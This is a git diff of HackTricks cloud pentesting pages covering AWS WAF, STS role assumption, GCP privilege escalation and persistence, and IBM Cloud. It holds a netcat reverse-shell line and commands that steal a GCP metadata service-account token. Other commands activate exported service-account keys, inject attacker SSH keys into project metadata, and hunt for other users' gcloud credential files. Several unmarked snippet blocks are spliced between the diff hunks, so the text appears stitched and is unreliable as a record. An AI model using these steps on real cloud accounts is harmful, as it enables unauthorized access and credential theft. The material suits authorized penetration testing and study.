Service Limits -#### Security Checks - -* Security group open access to specific high-risk ports -* Security group unrestricted access -* Open write and List access to S3 buckets -* MFA on root account -* Overly permissive RDS security group -* Use of cloudtrail -* Route 53 MX records have SPF records -* ELB with poor or missing HTTPS config -* ELB security groups missing or overly permissive -* CloudFront cert checks - expired, weak, misconfigured -* IAM access keys not rotated in last 90 days -* Exposed access keys on GitHub etc -* Public EBS or RDS snapshots -* Missing or weak IAM password policy - -## **References** +### Security Checks + +A list of checks primarily focusing on identifying and rectifying security threats: + +- Security group settings for high-risk ports +- Security group unrestricted access +- Open write/list access to S3 buckets +- MFA enabled on root account +- RDS security group permissiveness +- CloudTrail usage +- SPF records for Route 53 MX records +- HTTPS configuration on ELBs +- Security groups for ELBs +- Certificate checks for CloudFront +- IAM access key rotation (90 days) +- Exposure of access keys (e.g., on GitHub) +- Public visibility of EBS or RDS snapshots +- Weak or absent IAM password policies + +AWS Trusted Advisor acts as a crucial tool in ensuring the optimization, performance, security, and fault tolerance of AWS services based on established best practices. + + +# **References** * [https://cloudsecdocs.com/aws/services/logging/other/#trusted-advisor](https://cloudsecdocs.com/aws/services/logging/other/#trusted-advisor) diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md index 6ec6fdfa5a..fcb589ff8c 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md +++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md @@ -14,42 +14,45 @@ Other ways to support HackTricks:
-## WAF +# AWS WAF -AWS WAF is a **web application firewall** that helps **protect your web applications** or APIs against common web exploits that may affect availability, compromise security, or consume excessive resources. AWS WAF gives you control over **how traffic reaches your applications** by enabling you to create **security rules that block common attack patterns**, such as SQL injection or cross-site scripting, and rules that filter out specific traffic patterns you define. +AWS WAF is a **web application firewall** designed to **safeguard web applications or APIs** against various web exploits which may impact their availability, security, or resource consumption. It empowers users to control incoming traffic by setting up **security rules** that mitigate typical attack vectors like SQL injection or cross-site scripting and also by defining custom filtering rules. -### Conditions +## Monitoring Criteria (Conditions) -Conditions allow you to specify **what elements of the incoming HTTP or HTTPS request you want WAF to be monitoring** (XSS, GEO - filtering by location-, IP address, Size constraints, SQL Injection attacks, strings and regex matching). Note that if you are restricting a country from cloudfront, this request won't arrive to the waf. +Conditions specify the elements of incoming HTTP/HTTPS requests that AWS WAF monitors, which include XSS, geographical location (GEO), IP addresses, Size constraints, SQL Injection, and patterns (strings and regex matching). It's important to note that requests restricted at the CloudFront level based on country won't reach WAF. -You can have **100 conditions of each type**, such as Geo Match or size constraints, however **Regex** is the **exception** to this rule where **only 10 Regex** conditions are allowed but this limit is possible to increase. You are able to have **100 rules and 50 Web ACLs per AWS account**. You are limited to **5 rate-based-rules** per account. Finally you can have **10,000 requests per second** when **using WAF** within your application load balancer. +Each AWS account can configure: +- **100 conditions** for each type (except for Regex, where only **10 conditions** are allowed, but this limit can be increased). +- **100 rules** and **50 Web ACLs**. +- A maximum of **5 rate-based rules**. +- A throughput of **10,000 requests per second** when WAF is implemented with an application load balancer. -### Rules +## Rule Configuration -Using these conditions you can create rules: For example, block request if 2 conditions are met.\ -When creating your rule you will be asked to select a **Rule Type**: **Regular Rule** or **Rate-Based Rule**. +Rules are crafted using the specified conditions. For instance, a rule might block a request if it meets 2 specific conditions. There are two types of rules: -The only **difference** between a rate-based rule and a regular rule is that **rate-based** rules **count** the **number** of **requests** that are being received from a particular IP address over a time period of **five minutes**. +1. **Regular Rule**: Standard rule based on specified conditions. +2. **Rate-Based Rule**: Counts requests from a specific IP address over a five-minute period. Here, users define a threshold, and if the number of requests from an IP exceeds this limit within five minutes, subsequent requests from that IP are blocked until the request rate drops below the threshold. The minimum threshold for rate-based rules is **2000 requests**. 
-When you select a rate-based rule option, you are asked to **enter the maximum number of requests from a single IP within a five minute time frame**. When the count limit is **reached**, **all other requests from that same IP address is then blocked**. If the request rate falls back below the rate limit specified the traffic is then allowed to pass through and is no longer blocked. When setting your rate limit it **must be set to a value above 2000**. Any request under this limit is considered a Regular Rule. +## Actions -### Actions +Actions are assigned to each rule, with options being **Allow**, **Block**, or **Count**: -An action is applied to each rule, these actions can either be **Allow**, **Block** or **Count**. +- **Allow**: The request is forwarded to the appropriate CloudFront distribution or Application Load Balancer. +- **Block**: The request is terminated immediately. +- **Count**: Tallies the requests meeting the rule's conditions. This is useful for rule testing, confirming the rule's accuracy before setting it to Allow or Block. -* When a request is **allowed**, it is **forwarded** onto the relevant CloudFront distribution or Application Load Balancer. -* When a request is **blocked**, the request is **terminated** there and no further processing of that request is taken. -* A **Count** action will **count the number of requests that meet the conditions** within that rule. This is a really good option to select when testing the rules to ensure that the rule is picking up the requests as expected before setting it to either Allow or Block. +If a request doesn't match any rule within the Web ACL, it undergoes the **default action** (Allow or Block). The order of rule execution, defined within a Web ACL, is crucial and typically follows this sequence: -If an **incoming request does not meet any rule** within the Web ACL then the request takes the action associated to a **default action** specified which can either be **Allow** or **Block**. An important point to make about these rules is that they are **executed in the order that they are listed within a Web ACL**. So be careful to architect this order correctly for your rule base, **typically** these are **ordered** as shown: +1. Allow Whitelisted IPs. +2. Block Blacklisted IPs. +3. Block requests matching any detrimental signatures. -1. WhiteListed IPs as Allow. -2. BlackListed IPs Block -3. Any Bad Signatures also as Block. +## CloudWatch Integration -### CloudWatch +AWS WAF integrates with CloudWatch for monitoring, offering metrics like AllowedRequests, BlockedRequests, CountedRequests, and PassedRequests. These metrics are reported every minute by default and retained for a period of two weeks. -WAF CloudWatch metrics are reported **in one minute intervals by default** and are kept for a two week period. The metrics monitored are AllowedRequests, BlockedRequests, CountedRequests, and PassedRequests. ## Enumeration @@ -87,6 +90,9 @@ However, an attacker could also be interested in disrupting this service so the TODO: PRs are welcome +# References +* https://www.citrusconsulting.com/aws-web-application-firewall-waf/#:~:text=Conditions%20allow%20you%20to%20specify,user%20via%20a%20web%20application. +
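An illustrative enumeration sketch with the newer `wafv2` API (ACL name/ID are placeholders; CloudFront-scoped ACLs must be queried in us-east-1):

```bash
# Web ACLs protecting regional resources (ALB, API Gateway...)
aws wafv2 list-web-acls --scope REGIONAL --region us-east-1

# Web ACLs attached to CloudFront distributions
aws wafv2 list-web-acls --scope CLOUDFRONT --region us-east-1

# Inspect the rules of a specific ACL
aws wafv2 get-web-acl --scope REGIONAL --name my-acl --id <acl-id> --region us-east-1
```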
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

diff --git a/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md b/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md
index ea3d5d4f1e..5ed7899ea1 100644
--- a/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md
+++ b/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md
@@ -16,15 +16,16 @@ Other ways to support HackTricks:

## STS

-AWS provides AWS **Security Token Service (AWS STS)** as a web service that enables you to **request** temporary, limited-privilege **credentials** for **AWS Identity and Access Management** (IAM) users or for users you authenticate (federated users).
+**AWS Security Token Service (STS)** is primarily designed to issue **temporary, limited-privilege credentials**. These credentials can be requested for **AWS Identity and Access Management (IAM)** users or for authenticated users (federated users).

-As the nature of the STS service is to **provide credentials to impersonate identities**, this service, eve if don't have a lot of options, will be very useful to **escalate privileges and obtain persistence**.
+Given that STS's purpose is to **issue credentials for identity impersonation**, the service is immensely valuable for **escalating privileges and maintaining persistence**, even though it might not have a wide array of options.

### Assume Role Impersonation

-The [AssumeRole](https://docs.aws.amazon.com/STS/latest/APIReference/API\_AssumeRole.html) action from AWS STS is what allows a principal to request credentials for another principal to impersonate him. When calling it, it returns an access key ID, secret key, and a session token for the specified ARN.
+The action [AssumeRole](https://docs.aws.amazon.com/STS/latest/APIReference/API\_AssumeRole.html) provided by AWS STS is crucial as it permits a principal to acquire credentials for another principal, essentially impersonating them. Upon invocation, it responds with an access key ID, a secret key, and a session token corresponding to the specified ARN.
+
+For Penetration Testers or Red Team members, this technique is instrumental for privilege escalation (as elaborated [**here**](../aws-privilege-escalation/aws-sts-privesc.md#sts-assumerole)). However, it's worth noting that this technique is quite conspicuous, so it is unlikely to catch defenders by surprise.

-As a Penetration Tester or Red Teamer, this technique is useful to privesc (as explained [**here**](../aws-privilege-escalation/aws-sts-privesc.md#sts-assumerole)), but it's the most obvious technique to privesc, so it won't caught the attacker by surprise.

#### Assume Role Logic

diff --git a/pentesting-cloud/gcp-pentesting/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md b/pentesting-cloud/gcp-pentesting/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md
index fbe0dc654a..991d349c0e 100644
--- a/pentesting-cloud/gcp-pentesting/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md
+++ b/pentesting-cloud/gcp-pentesting/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md
@@ -16,21 +16,7 @@ Other ways to support HackTricks:

## Modifying the metadata

-If you can **modify the instance's metadata**, there are numerous ways to escalate privileges locally.
There are a few scenarios that can lead to a service account with this permission:
-
-_**Default service account**_\
-If the service account access **scope** is set to **full access** or at least is explicitly allowing **access to the compute API**, then this configuration is **vulnerable** to escalation. The **default** **scope** is **not** **vulnerable**.
-
-_**Custom service account**_\
-When using a custom service account, **one** of the following IAM permissions **is** **necessary** to escalate privileges:
-
-* `compute.instances.setMetadata` (to affect a single instance)
-* `compute.projects.setCommonInstanceMetadata` (to affect all instances in the project)
-
-Although Google [recommends](https://cloud.google.com/compute/docs/access/service-accounts#associating\_a\_service\_account\_to\_an\_instance) not using access scopes for custom service accounts, it is still possible to do so. You'll need one of the following **access scopes**:
-
-* `https://www.googleapis.com/auth/compute`
-* `https://www.googleapis.com/auth/cloud-platform`
+An attacker with permissions to **modify the instance's metadata** could compromise or escalate to the service account attached to that instance (whose token might be restricted by a scope):

### **Add SSH keys to custom metadata**

@@ -133,6 +119,9 @@ gcloud compute project-info add-metadata --metadata-from-file ssh-keys=meta.txt

If you're really bold, you can also just type `gcloud compute ssh [INSTANCE]` to use your current username on other boxes.

+## References
+
+* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)
+
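A minimal end-to-end sketch of the SSH-key technique above (the username `attacker` and the file names are hypothetical; a real run would normally append to the existing `ssh-keys` metadata value rather than overwrite it):

```bash
# Generate a throwaway key pair without a passphrase
ssh-keygen -t rsa -N '' -f ./privesc_key

# Build the metadata entry in the expected "username:public-key" format
echo "attacker:$(cat ./privesc_key.pub)" > meta.txt

# Push it as project-wide metadata (affects every instance accepting project keys)
gcloud compute project-info add-metadata --metadata-from-file ssh-keys=meta.txt

# Log in with the freshly authorized key
ssh -i ./privesc_key attacker@[INSTANCE_IP]
```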
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md
index 16c01a5ee7..64f749e725 100644
--- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md
+++ b/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md
@@ -55,11 +55,12 @@ nc 443 -e /bin/bash
```

{% hint style="warning" %}
-Note that the **first time a GCP action is performed in Cloud Shell that requires authentication**, it **pops up** an authorization window in the user’s browser that must be accepted before the command runs. If an unexpected pop-up comes up, a target could get suspicious and burn the persistence method.
-
-This is the pop-up from executing `gcloud projects list` from the cloud shell (as attacker) viewed in the browsers user session.
+It is important to note that the **first time an action requiring authentication is performed**, a pop-up authorization window appears in the user's browser. This window must be accepted before the command can run. If an unexpected pop-up appears, it could raise suspicion and potentially compromise the persistence method being used.
{% endhint %}

+This is the pop-up from executing `gcloud projects list` from the cloud shell (as attacker) viewed in the user's browser session:
+
+
However, if the user has actively used the Cloud Shell, the pop-up won't appear and you can **gather the user's tokens with**:

diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md
index 5713292a2d..109eec37d7 100644
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md
+++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md
@@ -45,23 +45,15 @@ This is how I **test for specific permissions** to perform specific actions insi

## Bypassing access scopes

-When [access scopes](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam) are used, the OAuth token that is generated for the computing instance (VM) will **have a** [**scope**](https://oauth.net/2/scope/) **limitation included**. However, you might be able to **bypass** this limitation and exploit the permissions the compromised account has.
-
-The **best way to bypass** this restriction is either to **find new credentials** in the compromised host, to **find the service key to generate an OAuth token** without restriction or to **jump to a different VM less restricted**.
-
-**Pop another box**
-
-It's possible that another box in the environment exists with less restrictive access scopes. If you can view the output of `gcloud compute instances list --quiet --format=json`, look for instances with either the specific scope you want or the **`auth/cloud-platform`** all-inclusive scope.
-
-Also keep an eye out for instances that have the default service account assigned (`PROJECT_NUMBER-compute@developer.gserviceaccount.com`).
+Tokens of SAs leaked from the GCP metadata service have **access scopes**. These are **restrictions** on the **permissions** that the token has. For example, if the token has the **`https://www.googleapis.com/auth/cloud-platform`** scope, it will have **full access** to all GCP services. However, if the token has the **`https://www.googleapis.com/auth/cloud-platform.read-only`** scope, it will only have **read-only access** to all GCP services even if the SA has more permissions in IAM.

-**Search service account keys**

-Google states very clearly [**"Access scopes are not a security mechanism… they have no effect when making requests not authenticated through OAuth"**](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam).

-Therefore, if you **find a** [**service account key**](https://cloud.google.com/iam/docs/creating-managing-service-account-keys) stored on the instance you can bypass the limitation. These are **RSA private keys** that can be used to authenticate to the Google Cloud API and **request a new OAuth token with no scope limitations**.
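To see which scopes a leaked token actually carries, you can query the standard `tokeninfo` endpoint; a minimal sketch run from the compromised VM (assuming `curl` and `python3` are available):

```bash
# Grab the default SA token from the metadata endpoint
TOKEN=$(curl -s -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" \
  | python3 -c 'import sys, json; print(json.load(sys.stdin)["access_token"])')

# Ask Google which scopes (and expiry) the token carries
curl -s "https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=$TOKEN"
```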
+The **best way to bypass** this restriction is either to **find new credentials** in the compromised host, to **find the service key to generate an OAuth token** without restriction or to **compromise a different VM with a SA less restricted**.

-Check if any service account has exported a key at some point with:
+Check which SAs have generated keys with:

```bash
for i in $(gcloud iam service-accounts list --format="table[no-heading](email)"); do
@@ -70,53 +62,6 @@ for i in $(gcloud iam service-accounts list --format="table[no-heading](email)")
done
```

-These files are **not stored on a Compute Instance by default**, so you'd have to be lucky to encounter them. The default name for the file is `[project-id]-[portion-of-key-id].json`. So, if your project name is `test-project` then you can **search the filesystem for `test-project*.json`** looking for this key file.
-
-The contents of the file look something like this:
-
-```json
-{
-"type": "service_account",
-"project_id": "[PROJECT-ID]",
-"private_key_id": "[KEY-ID]",
-"private_key": "-----BEGIN PRIVATE KEY-----\n[PRIVATE-KEY]\n-----END PRIVATE KEY-----\n",
-"client_email": "[SERVICE-ACCOUNT-EMAIL]",
-"client_id": "[CLIENT-ID]",
-"auth_uri": "https://accounts.google.com/o/oauth2/auth",
-"token_uri": "https://accounts.google.com/o/oauth2/token",
-"auth_provider_x509_cert_url": "https://www.googleapis.com/oauth2/v1/certs",
-"client_x509_cert_url": "https://www.googleapis.com/robot/v1/metadata/x509/[SERVICE-ACCOUNT-EMAIL]"
-}
-```
-
-Or, if **generated from the CLI** they will look like this:
-
-```json
-{
-"name": "projects/[PROJECT-ID]/serviceAccounts/[SERVICE-ACCOUNT-EMAIL]/keys/[KEY-ID]",
-"privateKeyType": "TYPE_GOOGLE_CREDENTIALS_FILE",
-"privateKeyData": "[PRIVATE-KEY]",
-"validAfterTime": "[DATE]",
-"validBeforeTime": "[DATE]",
-"keyAlgorithm": "KEY_ALG_RSA_2048"
-}
-```
-
-If you do find one of these files, you can tell the **`gcloud` command to re-authenticate** with this service account. You can do this on the instance, or on any machine that has the tools installed.
-
-```bash
-gcloud auth activate-service-account --key-file [FILE]
-```
-
-You can now **test your new OAuth token** as follows:
-
-```bash
-TOKEN=`gcloud auth print-access-token`
-curl https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=$TOKEN
-```
-
-You should see `https://www.googleapis.com/auth/cloud-platform` listed in the scopes, which means you are **not limited by any instance-level access scopes**. You now have full power to use all of your assigned IAM permissions.
-
## Privilege Escalation Techniques

The way to escalate your privileges in GCP is to have enough permissions to be able to, somehow, access other service account/users/groups privileges. Chaining escalations until you have admin access over the organization.

@@ -159,6 +104,7 @@ If you are inside a machine in GCP you might be able to abuse permissions to esc

* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
* [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#gcp-privesc-scanner)
+* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)
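Where the text above mentions using a found service key to mint an unrestricted token, a minimal sketch of putting such a key to use (the file path is illustrative):

```bash
# Authenticate gcloud as the service account behind the exported key
gcloud auth activate-service-account --key-file /path/to/exported-key.json

# Tokens minted this way are not limited by instance-level access scopes
gcloud auth print-access-token
```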
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md
index 0a50acebd8..9a1a87db60 100644
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md
+++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md
@@ -54,23 +54,19 @@ Check the following permissions:

## Search for Keys in the filesystem

-It's quite possible that **other users on the same box have been running `gcloud`** commands using an account more powerful than your own. You'll **need local root** to do this.
-
-First, find what `gcloud` config directories exist in users' home folders.
+Check if other users have logged in to gcloud inside the box and left their credentials in the filesystem:

```
sudo find / -name "gcloud"
```

-You can manually inspect the files inside, but these are generally the ones with the secrets:
+These are the most interesting files:

* `~/.config/gcloud/credentials.db`
* `~/.config/gcloud/legacy_credentials/[ACCOUNT]/adc.json`
* `~/.config/gcloud/legacy_credentials/[ACCOUNT]/.boto`
* `~/.credentials.json`

-Now, you have the option of looking for clear text credentials in these files or simply copying the entire `gcloud` folder to a machine you control and running `gcloud auth list` to see what accounts are now available to you.
-
### More API Keys regexes

```bash
diff --git a/pentesting-cloud/ibm-cloud-pentesting/README.md b/pentesting-cloud/ibm-cloud-pentesting/README.md
index c899d45749..ca132a3cfd 100644
--- a/pentesting-cloud/ibm-cloud-pentesting/README.md
+++ b/pentesting-cloud/ibm-cloud-pentesting/README.md
@@ -16,14 +16,15 @@ Other ways to support HackTricks:

## What is IBM cloud? (By chatGPT)

-IBM Cloud is a cloud computing platform offered by IBM that provides a suite of cloud services, including infrastructure as a service (IaaS), platform as a service (PaaS), and software as a service (SaaS). It provides customers with the ability to deploy and manage applications, store and analyze data, and run virtual machines on the cloud.
+IBM Cloud, a cloud computing platform by IBM, offers a variety of cloud services such as infrastructure as a service (IaaS), platform as a service (PaaS), and software as a service (SaaS). It enables clients to deploy and manage applications, handle data storage and analysis, and operate virtual machines in the cloud.

-In comparison to Amazon Web Services (AWS), IBM Cloud provides a similar range of services, but has some differences in terms of offerings and approach. Here are some key differences between IBM Cloud and AWS:
+When compared with Amazon Web Services (AWS), IBM Cloud showcases certain distinct features and approaches:
+
+1. **Focus**: IBM Cloud primarily caters to enterprise clients, providing a suite of services designed for their specific needs, including enhanced security and compliance measures. In contrast, AWS presents a broad spectrum of cloud services for a diverse clientele.
+2. **Hybrid Cloud Solutions**: Both IBM Cloud and AWS offer hybrid cloud services, allowing integration of on-premises infrastructure with their cloud services. However, the methodology and services provided by each differ.
+3. **Artificial Intelligence and Machine Learning (AI & ML)**: IBM Cloud is particularly noted for its extensive and integrated services in AI and ML.
AWS also offers AI and ML services, but IBM's solutions are considered more comprehensive and deeply embedded within its cloud platform.
+4. **Industry-Specific Solutions**: IBM Cloud is recognized for its focus on particular industries like financial services, healthcare, and government, offering bespoke solutions. AWS caters to a wide array of industries but might not have the same depth in industry-specific solutions as IBM Cloud.

-1. **Focus**: AWS has a broad range of cloud services, whereas IBM Cloud has a stronger focus on enterprise clients and provides a suite of services tailored for their needs, including security and compliance.
-2. **Hybrid Cloud**: IBM Cloud provides a hybrid cloud offering, allowing customers to run applications on both their own on-premises infrastructure and on the IBM Cloud. AWS also provides hybrid cloud solutions, but with a different approach and set of services.
-3. **Artificial Intelligence and Machine Learning**: IBM Cloud has a strong focus on artificial intelligence (AI) and machine learning (ML), offering a suite of services in these areas. AWS also provides services in AI and ML, but IBM's offerings are more extensive and integrated with its cloud platform.
-4. **Industries**: IBM Cloud has a strong focus on specific industries, including financial services, healthcare, and government, and provides solutions tailored to their needs. AWS provides solutions across a wide range of industries, but may not have the same level of industry-specific offerings as IBM Cloud.

### Basic Information

@@ -40,6 +41,8 @@ Learn how you can access the medata endpoint of IBM in the following page:

{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#2af0" %}

+## References
+
+* [https://redresscompliance.com/navigating-the-ibm-cloud-a-comprehensive-overview/](https://redresscompliance.com/navigating-the-ibm-cloud-a-comprehensive-overview/)